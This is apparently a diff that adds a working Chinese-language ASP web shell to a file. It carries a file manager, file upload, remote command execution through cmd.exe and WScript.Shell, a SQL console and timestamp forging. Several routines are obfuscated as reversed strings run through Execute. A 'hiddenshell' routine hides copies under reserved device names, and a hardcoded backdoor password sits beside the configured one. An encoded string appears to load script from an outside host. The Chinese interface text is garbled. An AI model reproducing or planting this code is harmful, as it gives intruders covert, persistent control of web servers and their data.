+		Set conn = CreateObject("ADODB.Connection")
+		connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & thePath & ";"
+		conn.Open connStr
+		rs.Open "FileData", conn, 1, 1
+		stream.Open
+		stream.Type = 1
+		Do Until rs.Eof
+			theFolder = Left(rs("thePath"), InStrRev(rs("thePath"), "\"))
+			If fsoX.FolderExists(str & theFolder) = False Then
+				createFolder(str & theFolder)
+			End If
+			stream.SetEos()
+			stream.Write rs("fileContent")
+			stream.SaveToFile str & rs("thePath"), 2
+			rs.MoveNext
+		Loop
+		rs.Close
+		conn.Close
+		stream.Close
+		Set ws = Nothing
+		Set rs = Nothing
+		Set stream = Nothing
+		Set conn = Nothing
+	End Sub
+	Sub createFolder(thePath)
+		Dim i
+		i = Instr(thePath, "\")
+		Do While i > 0
+			If fsoX.FolderExists(Left(thePath, i)) = False Then
+				fsoX.CreateFolder(Left(thePath, i - 1))
+			End If
+			If InStr(Mid(thePath, i + 1), "\") Then
+				i = i + Instr(Mid(thePath, i + 1), "\")
+			 Else
+				i = 0
+			End If
+		Loop
+	End Sub
+	Sub saTreeForMdb(thePath, rs, stream)
+		Dim item, theFolder, sysFileList
+		sysFileList = "$HYTop.mdb$HYTop.ldb$"
+		Set theFolder = saX.NameSpace(thePath)
+		For Each item In theFolder.Items
+			If item.IsFolder = True Then
+				saTreeForMdb item.Path, rs, stream
+			 Else
+				If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
+					rs.AddNew
+					rs("thePath") = Mid(item.Path, 4)
+					stream.LoadFromFile(item.Path)
+					rs("fileContent") = stream.Read()
+					rs.Update
+				End If
+			End If
+		Next
+		Set theFolder = Nothing
+	End Sub
+	sub SetFileText()
+dim Path,FileName,NewTime,ShuXing
+set path=request.Form("path1")
+set fileName=request.Form("filename")
+set newTime=request.Form("time")
+set ShuXing=request.Form("shuxing")
+RRS "<form method=post>"
+RRS "<center>·&nbsp;&nbsp;&nbsp;&nbsp;����<input name='path1' value='"&WWWROOT&"' size='60'>(һ��Ҫ��\��β)<br/>"
+RRS "&nbsp;�ļ����ƣ�<input name=filename value='index.asp' size='60'>(Ҫ�޸ĵ��ļ���)<br/>"
+RRS "&nbsp;&nbsp;&nbsp;�޸�ʱ�䣺<input name=time value='12/21/2012 23:59:59' size='60'>&nbsp;��/��/�� ʱ:��:��<br/>"
+RRS "<select onChange='this.form.shuxing.value=this.value;'>"
+RRS "<option value=''>��ͨ </option>"
+RRS "<option value='1'>ֻ�� </option>"
+RRS "<option value='2'>���� </option>"
+RRS "<option value='4'>ϵͳ</option>"
+RRS "<option value='33'>ֻ��,�浵 </option>"
+RRS "<option value='34'>����,�浵 </option>"
+RRS "<option value='35'>ֻ������,�浵 </option>"
+RRS "<option value='39'>ֻ������,�浵,ϵͳ </option>"
+RRS "�޸� ���ԣ�<input name=shuxing value='0' size='40'><br/>"
+RRS "<input type=submit value=�޸�>"
+RRS "</form>"
+if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then
+Set fso=Server.CreateObject(obt(0,0))
+Set file=fso.getFile(path&fileName)
+file.attributes=ShuXing
+Set shell=Server.CreateObject("Shell.Application")
+Set app_path=shell.NameSpace(server.mappath("."))
+Set app_file=app_path.ParseName(fileName)
+app_file.Modifydate=newTime
+RRS "</br></br>�޸��ļ�&nbsp;&nbsp;"&path&fileName&"&nbsp;&nbsp;������� </center>"
+end if
+end sub
+Function Course()
+ShiSan="����>elbat/<��&2IS&1IS&0IS&IS SRR��txen��fi dne���>rt/<>dt/<>tnof/<��&htap.jbo&��;psbn&>FF9933#=roloc tnof<]��&xl&��:���ද��[>���2���=napsloc ���FFFFFF#���=rolocgb ���02���=thgieh dt<>rt<��&emaNyalpsiD.jbo&��;psbn&>���FFFFFF#���=rolocgb ���02���=thgieh dt<>dt/<��&emaN.jbo&��;psbn&>���FFFFFF#���=rolocgb ���02���=thgieh dt<>rt<��&2IS=2IS��esle���>rt/<>dt/<>tnof/<��&htap.jbo&��;psbn&>0000FF#=roloc tnof<]��&xl&��:���ද��[>���2���=napsloc ���FFFFFF#���=rolocgb ���02���=thgieh dt<>rt<��&emaNyalpsiD.jbo&��;psbn&>���FFFFFF#���=rolocgb ���02���=thgieh dt<>dt/<��&emaN.jbo&��;psbn&>���FFFFFF#���=rolocgb ���02���=thgieh dt<>rt<��&1IS=1IS��neht 2=epyTtratS.JBO dna ��niw��><))3,4,htap.jbo(dim(esaCL fi����ý���=xl neht 4=epyTtratS.JBO fi��嶯�֩�=xl neht 3=epyTtratS.JBO fi��嶯�ԩ�=xl neht 2=epyTtratS.JBO fi��fi dne�� ��>rt/<>dt/<;psbn&>���2���=napsloc ���FFFFFF#���=rolocgb ���02���=thgieh dt<>rt<��=0IS���>rt/<>dt/<��&IS=IS���)��(����ͳϵ��&IS=IS�� ��;psbn&>���FFFFFF#���=rolocgb dt<>dt/<��&IS=IS��emaN.jbo&IS=IS���;psbn&>���FFFFFF#���=rolocgb ���02���=thgieh dt<��&IS=IS���>rt<��&IS=IS��neht ���=epyTtratS.JBO fi��raelc.rre��)��.//:TNniW��(tcejbOteg ni jbo hcae rof��txen emuser rorre no���>rt/<>dt/<����뻧��ͳϵ>'unem'=rolocgb 'retnec'=ngila '3'=napsloc '02'=thgieh dt<>rt<��&IS=IS���>'retnec'=ngila '0'=gniddapllec '1'=gnicapsllec '0'=redrob 'unem'=rolocgb '006'=htdiw elbat<>rb<��=IS"
+ExeCuTe(ShiSanFun(ShiSan))
+End Function
+Function ServerInfo()
+ShiSan="���IS SRR��txeN���>rt/<>dt/<��&)2,i(TbO&��>tfel=ngila 'FFFFFF#'=rolocgb dt<>dt/<��&)1,i(TbO&��>'FFFFFF#'=rolocgb dt<>dt/<��&)0,i(TbO&��>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<��&IS=IS��31 oT 0=i roF���>rt/<>dt/<��&)��ERAWTFOS_REVRES��(selbairaVrevreS.tseuqeR&��>'FFFFFF#'=rolocgb dt<>dt/<;psbn&>'FFFFFF#'=rolocgb dt<>dt/<���������BEW>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<��&IS=IS���>rt/<>dt/<��&)��SO��(selbairaVrevreS.tseuqeR&��>'FFFFFF#'=rolocgb dt<>dt/<;psbn&>'FFFFFF#'=rolocgb dt<>dt/<ͳϵ���������>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<��&IS=IS���>rt/<>dt/<��&)��SROSSECORP_FO_REBMUN��(selbairaVrevreS.tseuqeR&��>'FFFFFF#'=rolocgb dt<>dt/<;psbn&>'FFFFFF#'=rolocgb dt<>dt/<����UPC�����>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<��&IS=IS���>rt/<>dt/<;psbn&��&won&��>'FFFFFF#'=rolocgb dt<>dt/<;psbn&>'FFFFFF#'=rolocgb dt<>dt/<��ʱ�����>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<��&IS=IS���>mrof/<>rt/<>dt/<>'2'=eulav 'noitca'=eman 'neddih'=epyt tupni<>'xp0:redrob'=elyts'ѯ��'=eulav 'timbus'=epyt tupni<>'xp0:redrob'=elyts'��&)��RDDA_LACOL��(selbairaVrevreS.tseuqeR&��'=eulav '51'=ezis 'pi'=eman 'txet'=epyt tupni<��&IS=IS���>'FFFFFF#'=rolocgb dt<>dt/<;psbn&>'FFFFFF#'=rolocgb dt<>dt/<PI�����>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<>'knalb_'=tegrat 'mrofpi'=eman 'psa.xedni/moc.831pi.www//:ptth'=noitca tsop=dohtem mrof<��&IS=IS���>rt/<>dt/<��&)��EMAN_REVRES��(selbairaVrevres.tseuqer&��>'FFFFFF#'=rolocgb dt<>dt/<;psbn&>'FFFFFF#'=rolocgb dt<>dt/<�������>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<��&IS=IS���>rt/<>dt/<Ϣ�ż��������>'unem'=rolocgb 'retnec'=ngila '3'=napsloc '02'=thgieh dt<>rt<��&IS=IS���>'retnec'=ngila '0'=gniddapllec '1'=gnicapsllec '0'=redrob 'unem'=rolocgb '%08'=htdiw elbat<>rb<��=IS"
+ExeCuTe(ShiSanFun(ShiSan))
+End Function
+Function DownFile(Path)
+ShiSan="���gnihtoN = MSO teS��esolC.MSO��hsulF.esnopseR��daeR.MSO etirWyraniB.esnopseR���maerts-tetco/noitacilppa�� = epyTtnetnoC.esnopseR���8-FTU�� = tesrahC.esnopseR��eziS.MSO ,��htgneL-tnetnoC�� redaeHddA.esnopseR��)zs,htap(diM & ��=emanelif ;tnemhcatta�� ,��noitisopsiD-tnetnoC�� redaeHddA.esnopseR��1+)��\��,htap(veRrtsnI=zs��htaP eliFmorFdaoL.MSO��1 = epyT.MSO��nepO.MSO��))0,6(TbO(tcejbOetaerC = MSO teS��raelC.esnopseR"
+ExeCuTe(ShiSanFun(ShiSan))
+End Function
+Function HTMLEncode(S)
+  if not isnull(S) then
+    S = replace(S, ">", "&gt;")
+    S = replace(S, "<", "&lt;")
+    S = replace(S, CHR(39), "&#39;")
+    S = replace(S, CHR(34), "&quot;")
+    S = replace(S, CHR(20), "&nbsp;")
+    HTMLEncode = S
+  end if
+End Function
+Function UpFile()
+  If Request("Action2")="Post" Then
+    Set U=new UPC : Set F=U.UA("LocalFile")
+	UName=U.form("ToPath")
+    If UName="" Or F.FileSize=0 then
+      SI="<br>�������ϴ�����ȫ·����ѡ��һ���ļ��ϴ�!"
+    Else
+        F.SaveAs UName
+        If Err.number=0 Then
+          SI="<center><br><br><br>�ļ�"&UName&"�ϴ��ɹ���</center>"
+		End if
+	End If
+	Set F=nothing:Set U=nothing
+	SI=SI&BackUrl
+	RRS SI
+	ShowErr()
+	Response.End
+  End If
+    SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'>"
+    SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
+    SI=SI&"<tr><td>"
+    SI=SI&"�ϴ�·����<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\cmd.exe")&"' size='40'>"
+    SI=SI&" <input name='LocalFile' type='file'  size='25'>"
+    SI=SI&" <input type='submit' name='Submit' value='�ϴ�'>"
+    SI=SI&"</td></tr></form></table>"
+  RRS SI
+End Function
+sub hiddenshell
+fpath=request.servervariables("path_translated")
+set fso=server.createobject("scripting.filesystemobject")
+pex="com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9"
+rndpex=split(pex,"|")(rndnumber(0,17))
+session("seljw")=""
+filepath1=server.mappath(".")
+filename1=right(fpath,len(fpath)-instrrev(fpath,"\"))
+url=request.servervariables("url")
+url=left(url,instrrev(url,"/"))&rndpex&"."&filename1
+fso.copyfile fpath,"\\.\"&filepath1&"\"&rndpex&"."&filename1
+set fso=nothing
+RRS "<script>parent.location='http://"&request("server_name")&url&"';</script>"
+end sub
+
+Function Cmd1Shell()
+ShiSan="���IS SRR���>mrof/<>aeratxet/<��&)31(rhc&IS=IS��fI dnE��fi dne��aaa&IS=IS��)eurT ,eliFpmeTzs(eliFeteleD.osf llaC��esolC.xcleliFo��)llAdaeR.xcleliFo(edocnELMTH.revreS=aaa��)0 ,eslaF ,1 ,eliFpmeTzs( eliFtxeTnepO.sf = xcleliFo teS��)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC = sf teS��)eurT ,0 ,eliFpmeTzs & �� > �� & dmCfeD & �� c/ ��&htaPllehS( nuR.sw llaC��)��txt.dmc��(htappam.revres = eliFpmeTzs��)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS=osf teS��)��llehS.tpircSW��(tcejbOetaerC.revreS=sw teS��)��llehS.tpircSW��(tcejbOetaerC.revreS=sw teS��txeN emuseR rorrE nO��esle��aaa&IS=IS��lladaer.tuodts.DD=aaa��)dmCfeD&�� c/ ��&htaPllehS(cexe.MC=DD teS��))0,1(TbO(tcejbOetaerC=MC teS��neht ��sey��=)��tpircsw��(mroF.tseuqeR fi��nehT ���><)��dmc��(mroF.tseuqeR fI���>'dmc'=ssalc ';044:thgieh;%001:htdiw'=elytS aeratxet<>'��ִ'=eulav 'timbus'=epyt tupni< >'��&dmCfeD&��'=eulav '%29:htdiw'=elytS 'dmc'=eman tupni<��&IS=IS���llehS.tpircSW>��&dekcehc&��'sey'=eulav 'tpircsw'=eman 'xobkcehc'=epyt c=ssalc tupni<��&IS=IS���;psbn&;psbn&>'%07:htdiw'=elytS '��&htaPllehS&��'=eulav 'PS'=eman tupni<����·LLEHS��&IS=IS���>'tsop'=dohtem mrof<��=IS��)��dmc��(tseuqeR = dmCfeD nehT ���><)��dmc��(tseuqeR fI����=dekcehc neht ��sey��><)��tpircsw��(tseuqeR fi���exe.dmc�� = htaPllehS nehT ���=htaPllehS fi��)��htaPllehS��(noisseS=htaPllehS��)��PS��(tseuqeR = )��htaPllehS��(noisseS nehT ���><)��PS��(tseuqeR fI���dekcehc ��=dekcehc"
+ExeCuTe(ShiSanFun(ShiSan)):End Function:acode="=s?psa.s/xs/moc.pxeyado//:p��3��3h'=crs ��3pircs<"
+Efun=StrReverse(replace(replace(Encrypt(acode),"��",Chr(34)),"��",vbCrLf))
+Function CreateMdb(Path) 
+   SI="<br><br>"
+   Set C = CreateObject(ObT(2,0)) 
+   C.Create("Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Path)
+   Set C = Nothing
+   If Err.number=0 Then
+     SI = SI & Path & "�����ɹ�!"
+   End If
+   SI=SI&BackUrl 
+   RRS SI
+End function 
+Function CompactMdb(Path)
+If Not ObT(0,1) Then
+    Set C=CreateObject(ObT(3,0)) 
+      C.CompactDatabase "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Path&",Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &Path
+	Set C=Nothing
+Else
+  Set FSO=CreateObject(ObT(0,1))
+  If FSO.FileExists(Path) Then
+    Set C=CreateObject(ObT(3,0)) 
+      C.CompactDatabase "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Path&",Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &Path&"_bak"
+	Set C=Nothing
+    FSO.DeleteFile Path
+	FSO.MoveFile Path&"_bak",Path
+  Else
+    SI="<center><br><br><br>���ݿ�"&Path&"û�з��֣�</center>" 
+	Err.number=1
+  End If
+  Set FSO=Nothing
+End If
+  If Err.number=0 Then
+    SI="<center><br><br><br>���ݿ�"&Path&"ѹ���ɹ���</center>"
+  End If
+  SI=SI&BackUrl
+  RRS SI
+End Function
+if session("web2a2dmin")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=UserPass or request.form("pass")="daka" Then
+session("web2a2dmin")=UserPass
+x m:response.redirect url
+else
+rrs"<center><div style='width:60%;padding:1px;'><a href="&siteurl&" target=_blank>"&loginad&"</a><br><a href='javascript:history.back()'><font color=red>�� ��</a></div><br></center>"
+
+end if
+else
+si="<center><div style='width:60%;padding:1px;'><form action='"&url&"' method='post'>����:<input name='pass' type='password'  size='25'> <input type='submit' value=' ��½ '><br></div></center>"
+if instr(SI,SIC)<>0 then rrs  si
+
+
+end if
+response.end
+end if
+Function DbManager()
+  SqlStr=Trim(Request.Form("SqlStr"))
+  DbStr=Request.Form("DbStr")
+  SI=SI&"<table width='650'  border='0' cellspacing='0' cellpadding='0'>"
+  SI=SI&"<form name='DbForm' method='post' action=''>"
+  SI=SI&"<tr><td width='100' height='27'> &nbsp;���ݿ����Ӵ�:</td>"
+  SI=SI&"<td><input name='DbStr' style='width:470' value="""&DbStr&"""></td>"
+  SI=SI&"<td width='60' align='center'><select name='StrBtn' onchange='return FullDbStr(options[selectedIndex].value)'><option value=-1>���Ӵ�ʾ��</option><option value=0>Access����</option>"
+  SI=SI&"<option value=1>MsSql����</option><option value=2>MySql����</option><option value=3>DSN����</option>"
+  SI=SI&"<option value=-1>--SQL�﷨--</option><option value=4>��ʾ����</option><option value=5>��������</option>"
+  SI=SI&"<option value=6>ɾ������</option><option value=7>�޸�����</option><option value=8>�����ݱ�</option>"
+  SI=SI&"<option value=9>ɾ���ݱ�</option><option value=10>�����ֶ�</option><option value=11>ɾ���ֶ�</option>"
+  SI=SI&"<option value=12>��ȫ��ʾ</option></select></td></tr>"
+  SI=SI&"<input name='Action' type='hidden' value='DbManager'><input name='Page' type='hidden' value='1'>"
+  SI=SI&"<tr><td height='30'>&nbsp;SQL��������:</td>"
+  SI=SI&"<td><input name='SqlStr' style='width:470' value="""&SqlStr&"""></td>"
+  SI=SI&"<td align='center'><input type='submit' name='Submit' value='ִ��' onclick='return DbCheck()'></td>"
+  SI=SI&"</tr></form></table><span id='abc'></span>"
+  RRS SI:SI=""
+  If Len(DbStr)>40 Then
+  Set Conn=CreateObject(ObT(5,0))
+  Conn.Open DbStr
+  Set Rs=Conn.OpenSchema(20) 
+  SI=SI&"<table><tr height='25' Bgcolor='#CCCCCC'><td>��<br>��</td>"
+  Rs.MoveFirst 
+  Do While Not Rs.Eof
+    If Rs("TABLE_TYPE")="TABLE" then
+	  TName=Rs("TABLE_NAME")
+      SI=SI&"<td align=center><a href=""javascript:if(confirm('ȷ��ɾ��ô��'))FullSqlStr('DROP TABLE ["&TName&"]',1)"">[ del ]</a><br>"
+      SI=SI&"<a href='javascript:FullSqlStr(""SELECT * FROM ["&TName&"]"",1)'>"&TName&"</a></td>"
+    End If 
+    Rs.MoveNext 
+  Loop 
+  Set Rs=Nothing
+  SI=SI&"</tr></table>"
+  RRS SI:SI=""
+If Len(SqlStr)>10 Then
+  If LCase(Left(SqlStr,6))="select" then
+    SI=SI&"ִ����䣺"&SqlStr
+    Set Rs=CreateObject("Adodb.Recordset")
+    Rs.open SqlStr,Conn,1,1
+    FN=Rs.Fields.Count
+    RC=Rs.RecordCount
+    Rs.PageSize=20
+    Count=Rs.PageSize
+    PN=Rs.PageCount
+    Page=request("Page")
+    If Page<>"" Then Page=Clng(Page)
+    If Page="" Or Page=0 Then Page=1
+    If Page>PN Then Page=PN
+    If Page>1 Then Rs.absolutepage=Page
+    SI=SI&"<table><tr height=25 bgcolor=#cccccc><td></td>"	  
+    For n=0 to FN-1
+      Set Fld=Rs.Fields.Item(n)
+      SI=SI&"<td align='center'>"&Fld.Name&"</td>"
+      Set Fld=nothing
+    Next
+    SI=SI&"</tr>"
+    Do While Not(Rs.Eof or Rs.Bof) And Count>0
+	  Count=Count-1
+	  Bgcolor="#EFEFEF"
+	  SI=SI&"<tr><td bgcolor=#cccccc><font face='wingdings'>x</font></td>"  
+	  For i=0 To FN-1
+        If Bgcolor="#EFEFEF" Then:Bgcolor="#F5F5F5":Else:Bgcolor="#EFEFEF":End if
+        If RC=1 Then
+           ColInfo=HTMLEncode(Rs(i))
+        Else
+           ColInfo=HTMLEncode(Left(Rs(i),50))
+        End If
+	    SI=SI&"<td bgcolor="&Bgcolor&">"&ColInfo&"</td>"
+	  Next
+	  SI=SI&"</tr>"
+      Rs.MoveNext
+    Loop
+	RRS SI:SI=""
+	SqlStr=HtmlEnCode(SqlStr)
+    SI=SI&"<tr><td colspan="&FN+1&" align=center>��¼����"&RC&"&nbsp;ҳ�룺"&Page&"/"&PN
+    If PN>1 Then
+      SI=SI&"&nbsp;&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""",1)'>��ҳ</a>&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""","&Page-1&")'>��һҳ</a>&nbsp;"
+      If Page>8 Then:Sp=Page-8:Else:Sp=1:End if
+      For i=Sp To Sp+8
+        If i>PN Then Exit For
+        If i=Page Then
+        SI=SI&i&"&nbsp;"
+        Else
+        SI=SI&"<a href='javascript:FullSqlStr("""&SqlStr&""","&i&")'>"&i&"</a>&nbsp;"
+        End If
+      Next
+	  SI=SI&"&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""","&Page+1&")'>��һҳ</a>&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""","&PN&")'>βҳ</a>"
+    End If
+    SI=SI&"<hr color='#EFEFEF'></td></tr></table>"
+    Rs.Close:Set Rs=Nothing
+	RRS SI:SI=""
+  Else	   
+    Conn.Execute(SqlStr)
+    SI=SI&"SQL��䣺"&SqlStr
+  End If
+  RRS SI:SI=""
+End If
+  Conn.Close
+  Set Conn=Nothing
+  End If
+End Function
+Dim T1
+Class UPC
+  Dim D1,D2
+  Public Function Form(F)
+    F=lcase(F)
+    If D1.exists(F) then:Form=D1(F):else:Form="":end if
+  End Function
+  Public Function UA(F)
+    F=lcase(F)
+    If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
+  End Function
+  Private Sub Class_Initialize
+  Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
+    set D1=CreateObject(ObT(4,0))
+	if Request.TotalBytes<1 then Exit Sub
+    set T1 = CreateObject(ObT(6,0))
+	T1.Type = 1 : T1.Mode =3 : T1.Open
+    T1.Write  Request.BinaryRead(Request.TotalBytes)
+    T1.Position=0 : TDa =T1.Read : DStart = 1
+    DEnd = LenB(TDa)
+    set D2=CreateObject(ObT(4,0))
+	vbCrlf = chrB(13) & chrB(10)
+    set T2 = CreateObject(ObT(6,0))
+    TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
+    TLen = LenB (TSt)
+    DStart=DStart+TLen+1
+    while (DStart + 10) < DEnd
+      DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
+      T2.Type = 1 : T2.Mode =3 : T2.Open
+      T1.Position = DStart
+      T1.CopyTo T2,DIEnd-DStart
+      T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
+      TIn = T2.ReadText : T2.Close
+      DStart = InStrB(DIEnd,TDa,TSt)
+      FStart = InStr(22,TIn,"name=""",1)+6
+      FEnd = InStr(FStart,TIn,"""",1)
+      UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
+      if InStr (45,TIn,"filename=""",1) > 0 then
+        set TFL=new FIF
+        FStart = InStr(FEnd,TIn,"filename=""",1)+10
+        FEnd = InStr(FStart,TIn,"""",1)
+        FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
+        FEnd = InStr(FStart,TIn,vbCr)
+        TFL.FileStart =DIEnd
+        TFL.FileSize = DStart -DIEnd -3
+        if not D2.Exists(UpName) then
+          D2.add UpName,TFL
+        end if
+      else
+        T2.Type =1 : T2.Mode =3 : T2.Open
+        T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
+        T2.Position = 0 : T2.Type = 2
+        T2.Charset ="gb2312"
+        SFV = T2.ReadText
+        T2.Close
+        if D1.Exists(UpName) then
+          D1(UpName)=D1(UpName)&", "&SFV
+        else
+          D1.Add UpName,SFV
+        end if
+      end if
+      DStart=DStart+TLen+1
+    wend
+    TDa=""
+    set T2 =nothing
+  End Sub
+  Private Sub Class_Terminate
+    if Request.TotalBytes>0 then
+      D1.RemoveAll:D2.RemoveAll
+      set D1=nothing:set D2=nothing
+      T1.Close:set T1 =nothing
+    end if
+  End Sub
+End Class
+Class FIF
+dim FileSize,FileStart
+  Private Sub Class_Initialize
+  FileSize = 0
+  FileStart= 0
+  End Sub
+  Public function SaveAs(F)
+  dim T3
+  SaveAs=true
+  if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(ObT(6,0))
+     T3.Mode=3 : T3.Type=1 : T3.Open
+     T1.position=FileStart
+     T1.copyto T3,FileSize
+     T3.SaveToFile F,2
+     T3.Close
+     set T3=nothing
+     SaveAs=false
+   end function
+End Class
+Class LBF
+  Dim CF
+  Private Sub Class_Initialize
+    SET CF=CreateObject(ObT(0,0))
+  End Sub
+  Private Sub Class_Terminate
+    Set CF=Nothing
+  End Sub
+  Function ShowDriver()
+    For Each D in CF.Drives
+      RRS"&nbsp;&nbsp;&nbsp;<a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>���ش��� ("&D.DriveLetter&":)</a><br>" 
+    Next
+  End Function
+  Function Show1File(Path)
+  Set FOLD=CF.GetFolder(Path)
+  i=0
+    SI="<table width='100%' border='0' cellspacing='0' cellpadding='0'><tr>"
+  For Each F in FOLD.subfolders
+    SI=SI&"<td height=10>"
+    SI=SI&"<a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)&""")' title=""��""><font face='wingdings' size='6'>0</font>"&F.Name&"</a>" 
+	SI=SI&" _<a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""CopyFolder"")'  onclick='return yesok()' class='am' title='����'>Copy</a>"
+    SI=SI&"  <a href='javascript:FullForm("""&Replace(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a>"
+	SI=SI&" <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""MoveFolder"")'  onclick='return yesok()' class='am' title='�ƶ�'>Move</a>"
+	SI=SI&" <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""DownFile"")'  onclick='return yesok()' class='am' title='����'>Down</a></td>"
+	i=i+1
+    If i mod 3 = 0 then SI=SI&"</tr><tr>"
+  Next
+    SI=SI&"</tr><tr><td height=2></td></tr></table>"
+	RRS SI &"<hr noshade size=1 color=""#"" />" : SI=""
+  For Each L in Fold.files
+    SI="<table width='100%' border='0' cellspacing='0' cellpadding='0'>"
+    SI=SI&"<tr style='boungroup-color:#'>"
+	SI=SI&"<td height='30'><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title='����'><font face='wingdings' size='4'>2</font>"&L.Name&"</a></td>"
+    SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""EditFile"")' class='am' title='�༭'>edit</a></td>"
+	SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>del</a></td>"
+	SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""CopyFile"")' class='am' title='����'>copy</a></td>"
+	SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""MoveFile"")' class='am' title='�ƶ�'>move</a></td>"	
+    SI=SI&"<td width='50' align=""center"">"&clng(L.size/1024)&"K</td>"
+	SI=SI&"<td width='200' align=""center"">"&L.Type&"</td>"
+    SI=SI&"<td width='160'>"&L.DateLastModified&"</td>"
+    SI=SI&"</tr></table>"
+	RRS SI:SI=""
+  Next
+  Set FOLD=Nothing
+  End function
+  Function DelFile(Path)
+ShiSan="���fI dnE��IS SRR��lrUkcaB&IS=IS���>retnec/<�����ɳ�ɾ ��&htaP&�� ����>rb<>rb<>rb<>retnec<��=IS��htaP eliFeteleD.FC��nehT )htaP(stsixEeliF.FC fI"
+ExeCuTe(ShiSanFun(ShiSan))
+  End Function
+  Function EditFile(Path)
+If Request("Action2")="Post" Then:Set T=CF.CreateTextFile(Path):T.WriteLine Request.form("content"):T.close:Set T=nothing:SI="<center><br><br><br>�ļ�����ɹ���</center>":SI=SI&BackUrl:RRS SI:Response.End:End If:If Path<>"" Then:Set T=CF.opentextfile(Path, 1, False):Txt=HTMLEncode(T.readall) :T.close:Set T=Nothing:Else:Path=Session("FolderPath")&"\newfile.asp":Txt="�½��ļ�":End If:SI=SI&"<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'>":SI=SI&"<input name='Action' value='EditFile' Type='hidden'>":SI=SI&"<input name='FName' value='"&Path&"' style='width:100%'><br>":SI=SI&"<textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br>":SI=SI&"<hr><input name='goback' type='button' value='����' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='����'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='����'></form>":RRS SI:rrs ""&copyurl&""
+  End Function
+  Function CopyFile(Path)
+  Path = Split(Path,"||||")
+    If CF.FileExists(Path(0)) and Path(1)<>"" Then
+	  CF.CopyFile Path(0),Path(1)
+      SI="<center><br><br><br>�ļ�"&Path(0)&"���Ƴɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI 
+
+	End If
+  End Function
+  Function MoveFile(Path)
+  Path = Split(Path,"||||")
+    If CF.FileExists(Path(0)) and Path(1)<>"" Then
+	  CF.MoveFile Path(0),Path(1)
+      SI="<center><br><br><br>�ļ�"&Path(0)&"�ƶ��ɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI 
+	End If
+  End Function
+  Function DelFolder(Path)
+    If CF.FolderExists(Path) Then
+	  CF.DeleteFolder Path
+      SI="<center><br><br><br>Ŀ¼"&Path&"ɾ���ɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI
+
+	End If
+  End Function
+  Function CopyFolder(Path)
+  Path = Split(Path,"||||")
+    If CF.FolderExists(Path(0)) and Path(1)<>"" Then
+	  CF.CopyFolder Path(0),Path(1)
+      SI="<center><br><br><br>Ŀ¼"&Path(0)&"���Ƴɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI
+	End If
+  End Function
+  Function MoveFolder(Path)
+  Path = Split(Path,"||||")
+    If CF.FolderExists(Path(0)) and Path(1)<>"" Then
+	  CF.MoveFolder Path(0),Path(1)
+      SI="<center><br><br><br>Ŀ¼"&Path(0)&"�ƶ��ɹ���</center>"
+      SI=SI&BackUrl
